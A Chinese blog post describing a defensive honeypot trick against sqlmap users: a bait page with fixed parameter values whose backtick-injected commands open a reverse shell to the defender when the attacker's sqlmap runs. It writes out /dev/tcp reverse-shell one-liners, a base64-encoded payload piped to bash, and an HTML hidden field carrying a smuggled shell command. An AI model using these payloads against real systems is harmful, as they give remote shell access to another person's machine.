溯源反制-SQLMAP反制

#溯源反制-SQL注入工具-SQLMAP
复现环境:
蓝队:Linux Web
红队:Linux sqlmap
蓝队提前构造注入页面诱使红队进行sqlmap注入拿到红队机器权限
原理:
命令管道符:ping "`dir`"
构造注入点页面固定注入参数值,等待攻击者进行注入
sqlmap -u "http://47.94.xxx.xxx/test.html?id=aaa&b=`dir`"
sqlmap -u "http://47.94.xxx.xxx/test.html?id=aaa&b=`exec /bin/sh 0</dev/tcp/47.94.xxx.xxx/2333 1>&0 2>&0`"
1、测试反弹编码:
bash -i >& /dev/tcp/47.94.xxx.xxx/2333 0>&1
echo YmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxMgMD4mMQ== | base64 -d|bash -i
2、蓝队构造页面test.php注入页面固定参数值:
<html>
<head>
<meta charset="utf-8">
<title> A sqlmap honeypot demo</title>
</head>
<body>
<input>search the user</input> <!--创建一个空白表单-->
<form action="username.html" method="post" enctype="text/plain">
<!--创建一个隐藏的表单-->
<input type='hidden' name='name' value="xiaodi&id=45273434&query=shell`echo YmFzaxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxD4mMQ== | base64 -d|bash -i`&port=6379"/>
<!--创建一个按钮,提交表单内容-->
<input type="submit" value='提交'>
</form>
</body>
</html>
3、红队攻击者进行注入测试:
sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=asho&id=45273434&query=shell`echo YmFzcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxLzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值